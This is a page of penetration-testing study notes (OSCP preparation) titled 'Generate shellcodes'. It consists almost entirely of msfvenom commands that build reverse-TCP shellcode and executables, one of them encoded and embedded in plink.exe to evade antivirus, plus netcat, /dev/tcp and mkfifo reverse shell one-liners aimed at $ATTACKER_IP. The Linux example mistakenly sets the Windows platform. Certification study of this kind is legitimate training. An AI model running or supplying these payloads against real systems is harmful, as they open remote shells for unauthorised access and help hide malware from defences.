💻
oscp-study-notes
  • What is this?
  • Scanning & Enumeration
    • FTP 21
    • SMTP 25
    • HTTP/HTTPS 80/443/*
    • SMB 139/443
  • Vulnerabilites & Exploitation
    • Socket Programming
    • Generate shellcodes
    • Shellshock
    • Cross Compiling
    • LFI/RFI
    • SQL Injection
    • CVE2009-3103
    • MS17-010
  • Privilege Escalation
  • File Transfers
  • Buffer Overflow
  • Port Redirection and Tunneling
  • Password Cracking
  • Proof
  • Netcat
  • Third-party Tools
  • Bypass AV
  • Methodology
  • Writing a report
  • Further Reading
Powered by GitBook
On this page
  • Windows
  • Generate shellcode with specified size in python format
  • Linux
  • Reverse shell commands
  • Webshells
  • Commands

Was this helpful?

  1. Vulnerabilites & Exploitation

Generate shellcodes

Windows

msfvenom -a x86 --platform Windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT
msfvenom -p windows/shell_reverse_tcp -f exe \
    -e x86/shikata_ga_nai -i 9 \
    -x /usr/share/windows-binaries/plink.exe -o reverse.exe \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Generate shellcode with specified size in python format

msfvenom -a x86 --platform windows \
    -p windows/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -s $PAYLOAD_SIZE \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT \
    | msfvenom -a x86 --platform Windows -f python -v shellcode

Linux

msfvenom -a x86 --platform Windows \
    -p linux/x86/shell_reverse_tcp \
    -b '\x00\x40\x0a\x0d' \
    -f python -v shellcode \
    LHOST=$ATTACKER_IP LPORT=$ATTACKER_PORT

Reverse shell commands

nc $ATTACKER_IP 443 -e /bin/bash

If netcat is not on the target system:

/bin/bash -i >& /dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP $ATTACKER_PORT >/tmp/f

Webshells

Commands

PreviousSocket ProgrammingNextShellshock

Last updated 5 years ago

Was this helpful?